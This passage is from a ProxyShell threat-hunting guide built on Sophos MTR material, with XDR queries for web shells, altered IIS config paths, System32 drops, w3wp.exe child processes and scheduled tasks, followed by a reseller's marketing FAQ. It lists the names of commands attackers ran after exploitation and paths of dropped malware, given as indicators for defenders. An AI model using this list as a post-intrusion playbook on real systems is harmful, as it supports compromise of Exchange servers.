With the results, you can pivot from the path column of a suspected web shell by clicking the (…) button and selecting “File access history” to query and identify what processes have interacted with the file and which process created the file. Instances of w3wp.exe should be investigated to reveal further actions the adversary may have taken by pivoting from the sophosPID of the process, clicking the (…) button next to the sophosPID, and selecting the “Process activity history” query.

Historic web shell file creation events

Alternatively, to identify web shells that were dropped but may since have been deleted, you can interrogate the Sophos process and file journals for historic creations of .aspx files in the last day using the below XDR query for live Windows devices. To widen the hunt time range, change ‘now’ and ‘-1 days’ to the values that need to be investigated.

SELECT
CAST(datetime(sfj.time, 'unixepoch') AS TEXT) date,
CASE sfj.eventType
WHEN 0 THEN 'Created'
END eventType,
-- strip everything up to the last backslash to leave the file name
replace(sfj.pathname, rtrim(sfj.pathname, replace(sfj.pathname, '\', '')), '') fileName,
spj.pathname processPath,
sfj.pathname filePath
FROM sophos_file_journal sfj
LEFT JOIN sophos_process_journal spj
ON spj.sophosPID = sfj.sophosPID
-- the part of sophosPID after the last ':' is a Windows FILETIME; convert it to Unix time
AND spj.time = replace(sfj.sophosPID, rtrim(sfj.sophosPID, replace(sfj.sophosPID, ':', '')), '')/10000000-11644473600
WHERE sfj.time > strftime('%s', 'now', '-1 days')
AND sfj.eventType IN (0)
AND sfj.pathname LIKE '%.aspx';

Similarly, the sophosPID of suspect processes, especially w3wp.exe, should be pivoted from and the process activity history reviewed to determine other actions the adversary may have taken.

Modified applicationHost.config physicalPaths

Threat actors have also been observed modifying the Exchange configuration, typically located at C:\Windows\System32\inetsrv\Config\applicationHost.config, to add new virtual directory paths that obfuscate the location of web shells. These paths are defined in the config in the physicalPath attribute of a virtualDirectory definition. Any entries for web shells should be deleted and the IIS service restarted to reload the config.

The below XDR query for live Windows devices will list all physicalPath entries of the applicationHost.config file.

SELECT grep.*
FROM file
CROSS JOIN grep ON (grep.path = file.path)
WHERE file.path LIKE 'C:\Windows\System32\inetsrv\Config\applicationHost.config'
  AND grep.pattern = 'physicalPath';

New and suspicious files in System32

Actors have commonly been dropping malicious executables, via a web shell, into the System32 directory. Recently created .exe files and other suspicious files at this path should be investigated, for example:
E.g. C:\Windows\System32\createhidetask.exe
E.g. C:\Windows\System32\ApplicationUpdate.exe

The below XDR query for live Windows devices will list all the files currently in the System32 directory.
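
The page's query for this step is not reproduced above. The query below is an added example, not the page's or Sophos's own: it uses the standard osquery file table (path, filename, size, btime and mtime columns are assumed to be exposed unchanged through XDR live queries) and narrows the listing to .exe files created in the last 30 days. The 30-day window and the .exe filter are assumptions; drop them to list every file in the directory.

```sql
-- Added example (not the page's query): recently created .exe files in System32.
-- Assumes the osquery 'file' table as exposed by Sophos XDR live Windows queries.
SELECT
  path,
  filename,
  size,
  datetime(btime, 'unixepoch') AS created,
  datetime(mtime, 'unixepoch') AS modified
FROM file
WHERE path LIKE 'C:\Windows\System32\%'      -- single % = one directory level, not recursive
  AND filename LIKE '%.exe'                  -- remove to include DLLs, scripts, etc.
  AND btime > strftime('%s', 'now', '-30 days')   -- widen or remove to list all files
ORDER BY btime DESC;
```

btime is the NTFS creation timestamp and can be timestomped by an attacker, so treat it as a triage aid rather than proof. Corroborate any hit against sophos_file_journal creation events, as in the web shell query earlier, since the journal records the write as it happened and is not affected by altered filesystem metadata.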


3. Investigate historical command executions

PowerShell and cmd child processes of w3wp

As detailed in the previous section, the presence and use of web shells results in command executions and other suspicious activity stemming from the IIS worker process, w3wp.exe.

The below query for the XDR Data Lake lists the hosts where powershell.exe or cmd.exe ran as a child process of w3wp.exe, along with the commands that were executed.

-- Data Lake query: xdr_data holds the scheduled query results; meta_hostname identifies the device
SELECT
  meta_hostname,
  time,
  name,
  cmdline,
  parent_name
FROM xdr_data
WHERE query_name = 'running_processes_windows_sophos'
  AND parent_name = 'w3wp.exe'
  AND (name = 'powershell.exe'
    OR name = 'cmd.exe')

Sophos MTR has observed threat actors executing the following commands during ProxyShell incidents which may aid you in identifying post-exploit activity.

  • whoami
  • Invoke-WebRequest
  • Start-Process
  • ping
  • mkdir
  • reg add
  • net user
  • net accounts
  • net localgroup
  • icacls
  • takeown
  • tasklist
  • schtasks

4. Locate other forms of persistence

Scheduled Tasks

Sophos has observed threat actors establishing persistence on compromised devices by creating scheduled tasks to periodically execute a suspicious binary. The below XDR query for live Windows devices can be used to list the current Scheduled Tasks on a device which should be reviewed, and any suspicious tasks investigated.
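
The query the text refers to is not reproduced here. The query below is an added example, not the page's own, using osquery's scheduled_tasks table; the column names (name, path, action, enabled, state, hidden, last_run_time, next_run_time) are assumed to match the osquery schema as exposed through XDR live queries.

```sql
-- Added example (not the page's query): enabled scheduled tasks, hidden ones first.
-- Assumes the osquery 'scheduled_tasks' table on Windows.
SELECT
  name,
  path,
  action,                                      -- what the task runs; review non-standard binaries here
  enabled,
  hidden,
  state,
  datetime(last_run_time, 'unixepoch') AS last_run,
  datetime(next_run_time, 'unixepoch') AS next_run
FROM scheduled_tasks
WHERE enabled = 1
ORDER BY hidden DESC, last_run_time DESC;
```

Review action strings that point at binaries outside the usual locations, in particular the System32 drops from the previous section, hidden tasks, and tasks whose first run lines up with the web shell creation time found earlier. Note that schtasks appears in the command list above, so the task creation itself is often visible as a w3wp.exe child process in the Data Lake query.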


How Sophos Managed Threat Response (MTR) can help

Threats such as ProxyShell are a great example of the peace of mind you get knowing your organization is backed by an elite team of threat hunters and incident response experts.

When the ProxyShell news broke, the Sophos MTR team immediately began to hunt and investigate in customer environments to determine if any activity was related to the attack. Additionally, they looked to uncover any new artifacts (e.g. IOCs) related to the attack that could provide further protection for all Sophos customers.

The 24/7 nature of Sophos MTR meant that not a single second was wasted as we started hunting for evidence of abuse, ensuring our customers were protected.

Concerned about ProxyShell? Contact the team at Spear Shield to ensure that any potential adversarial activity in your environment is identified and neutralized, before any damage is done.


Change log

2021-08-24 UTC 08.00 Added Sophos detections
2021-08-24 UTC 08.41 Fixed error in Exchange version script
2021-08-24 UTC 13.05 Added details for hunting web shells in modified Exchange config
2021-08-24 UTC 13.54 Added link to Naked Security article on Web Shells
2021-08-24 UTC 15.36 Added details of new IPS signature
2021-08-25 UTC 07:55 Added information on additional behavioral-based protection for LockFile
2021-08-27 UTC 14.53 Aligned recommendations with guidance in our Sophos Community post
2021-08-31 UTC 17.12 Added data lake query for historic command executions stemming from w3wp.exe
2021-08-31 UTC 21.29 Restructured Sophos XDR guidance and added queries for searching IIS logs for autodiscover.json abuse, and Windows Events for New-MailboxExportRequest abuse
2021-09-07 UTC 14.54 Added additional file path to Web Shells On Disk query
2021-09-23 UTC 11.26 Updated “Analyze IIS logs…” query to search over both Aug and Sept


The Capabilities of a Modern SOC Delivered as a Fully-Managed Service.

“The Spear Shield team were very efficient helping us enhance our endpoint security.”

Exec-level ready reporting mapped to the MITRE ATT&CK Framework 

Provide assurance to your organisation with weekly and monthly activity reporting. Exec-level ready reports mapped to the MITRE ATT&CK Framework help you answer those difficult questions internally.


Why customers choose Sophos with Spear Shield.

The team at Spear Shield has over 15 combined years' experience working with (and for!) Sophos.


In-House Professional Services

Spear Shield customers can take comfort in the in-house Sophos Architect and Engineer expertise and resource available to support them.

Access to the best commercials available

The team at Spear Shield has access to the most competitive commercials available and can provide our customers with both term-based and MSP licensing options to accommodate all budget types.

Pre & Post Sales Support

Our job isn't to sell to you... It's to help you sell to the rest of your business. Spear Shield can provide full business case assistance with proposals and cyber risk quantification to support you both pre and post-sales too.



Everything you need to know about Spear Shield's Managed Threat Hunting and Incident Response Service.

What licensing options can Spear Shield provide?

Spear Shield can offer both Term-licensing and MSP options to our customers to be able to align and suit your preferred budget type and working style. Please speak with the team for details.

Can Spear Shield supply Public Sector Organisations through a Framework?

Yes! Spear Shield has routes to market to supply public sector organisations, including G-Cloud. Please speak with the team for details.

Can Spear Shield work with Large Enterprise?

Yes! And we do. Our team has many combined years' experience working with some of the largest private sector enterprises across the country to help tackle and solve cyber risk. All of Spear Shield's cybersecurity solutions and services are scalable and enterprise-grade.

Does Spear Shield offer Not-For-Profit Discount?

Yes, the Spear Shield Team will always ensure any eligible not-for-profit and public sector discounts are applied to any quotes.

Why Spear Shield for Managed Detection Response Services?

Other managed detection and response (MDR) services simply notify you of attacks or suspicious events. Then it's up to you to manage things from there.

With the Managed Threat Hunting and Incident Response (MTR) Service provided by Spear Shield, your organisation is backed by an elite team of threat hunters and response experts who take targeted actions on your behalf to neutralise even the most sophisticated threats.

What are some of the top cybersecurity threats for 2022?

Here are some of the top cybersecurity threats organisations are facing in 2022. 

Social Engineering
Any network is hackable if an employee can be duped into sharing access.

Third-Party Exposure
Vendors, clients, and app integrations with poor security can provide access to an otherwise well-protected network.

Configuration Mistakes
Your cybersecurity investments are only as strong as they are configured correctly.

Human Activated Risk
User education and visibility for IT is essential to ensure those with network access and those handling sensitive data are maintaining cyber best practices.

Ransomware
Hackers are increasingly targeting backups and using extortion to pressure victims into paying the ransom.

Mobile Devices
Every mobile device is a gateway to your network and sensitive business data.

Lack of resource and expertise
Human-led cyber attacks require human-led threat hunting. Unfortunately, skilled threat hunters are few and far between. 

Internet of Things (IoT)
Smart technology users may not realise that any IoT device can be hacked to obtain network access. Securing your network starts with understanding what's on it.

What are the different types of Threat Hunting?

“Threat hunting” is one of the latest cybersecurity terms to earn platinum-level buzzword status alongside “AI,” “machine learning,” and countless others. Everybody is talking about it, few actually do it, and many don’t understand what it really means (and at this point are too afraid to ask). So, let’s start with our definition of threat hunting.

Threat Hunting
A human-led investigation of causal and adjacent events (weak signals) to discover new Indicators of Attack (IoA) and Indicators of Compromise (IoC) that cannot be detected or stopped by existing tools.

To put it another way, a threat hunt is when an analyst conducts an investigation to detect attacks that tools don’t issue an alert about and which only a human can find. And while threat hunting is often described in absolute terms, there are actually three different categories of threat hunts: automated, lead-driven, and lead-less.

Automated: This type of threat hunt uses automation and/or machine learning to surface potentially malicious activity that may require further investigation by human analysts. While this is what many service providers are referencing when they say they do “managed threat hunting,” this is what is programmatically handled by Intercept X Advanced with EDR.

Lead-driven: This type of threat hunt involves a manual (human-led) identification and investigation of events and activities (leads) that do not generate an alert but could be indicative of new attacker behavior. The MTR Ops team performs lead-driven hunts for all Standard and Advanced tier MTR customers.

Lead-less: This type of threat hunt combines threat intelligence, data science, and knowledge of attacker behavior with what’s known about the customer’s environment (e.g. company profile, high-value assets, high risk users, etc.) to anticipate new attacker behaviors and validate detection and response capabilities. This category is sometimes called “methodology hunting,” and very few service providers have the ability to perform this kind of threat hunt. The MTR Ops team performs lead-less hunts for all Advanced tier MTR customers.

Why choose Spear Shield to procure Sophos?

Spear Shield has a combined 15+ years' experience working with and for Sophos.

The team at Spear Shield has a fantastic working relationship with Sophos to ensure we can provide our customers with the latest news about their solutions.

Spear Shield also has the in-house technical expertise to be able to provide our Sophos customers with Professional Services for implementation, health checks and VIP access to 3rd line engineers.

Spear Shield also use Sophos solutions internally to protect our own network, so customers can be assured that we practice what we preach.

Does Spear Shield perform the Threat Hunting as part of the MTR Service?

No, we don't. We leave that to our Threat Response friends over at Sophos.

Spear Shield are a Sophos Partner who provides our customers with the Sophos MTR Service.

Spear Shield can, however, provide a tailored managed service wrapper, or certified Sophos training delivered by our in-house Sophos professional services team.

How many customers use the Sophos MTR Service?

The Sophos MTR, 24/7 human-led threat hunting, detection, and response service, now supports over 10,000 organisations around the world.

How does the MTR Service align to the MITRE ATT&CK Framework?

MTR detections are mapped to specific techniques in the MITRE ATT&CK framework, a widely used knowledge base of adversary behaviours based on real-world observations. You will see the breakdown of detections, by percentage, in this section of the monthly report.

As with all detections, these are not necessarily malicious: benign behaviour may align with adversarial tactics and techniques. It is also important to note that the total number of MTR Cases may not equal the total number of adversarial tactics observed. Multiple adversarial tactics can be observed in one MTR Case, resulting in the number of tactics being greater than the total number of MTR Cases. Conversely, MTR Cases may be created that are not associated with adversarial activity (health check cases, for example), resulting in the total number of MTR Cases being greater than the total number of adversarial tactics.